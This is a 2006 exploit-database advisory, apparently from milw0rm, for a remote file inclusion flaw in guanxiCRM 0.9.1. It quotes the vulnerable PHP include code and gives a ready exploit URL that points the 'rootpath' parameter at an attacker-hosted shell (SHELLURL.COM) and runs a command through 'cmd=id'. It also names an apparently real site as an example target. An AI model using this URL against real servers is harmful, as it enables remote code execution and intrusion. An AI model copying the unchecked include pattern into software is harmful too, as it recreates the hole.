guanxiCRM Business Solution 0.9.1 - Remote File Inclusion



EKU-ID: 10386 CVE: OSVDB-30961;CVE-2006-4898 OSVDB-ID:
Author: SHiKaA Published: 2006-09-16 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


#==============================================================================================
#guanxiCRM <= v0.9.1 (rootpath) Remote File Inclusion Exploit
#===============================================================================================
#
#Critical Level : Dangerous
#
#Venedor site : http://sourceforge.net/projects/guanxicrm/
#
#Version : v0.9.1
#
#================================================================================================
#
#Example : http://www.nu3d.com/crm
#
#================================================================================================
#Bug in : include/phpxd/phpXD.php
#
#Vlu Code :
#--------------------------------
#     $path = $appconf["rootpath"]. "/include/phpxd/";
#
#     require($path."include/dom.php");
#     require($path."include/dtd.php");
#     require($path."include/parser.php");
#     ?>
#
#
#================================================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script Path]/include/phpxd/phpXD.php?appconf[rootpath]=http://SHELLURL.COM?&cmd=id
#
#================================================================================================
#Discoverd By : SHiKaA
#
#Conatact : SHiKaA-[at]hotmail.com
#
#Special Thx To : Str0ke & simoo & XoRoN & Saudi Hackerz
==================================================================================================

# milw0rm.com [2006-09-16]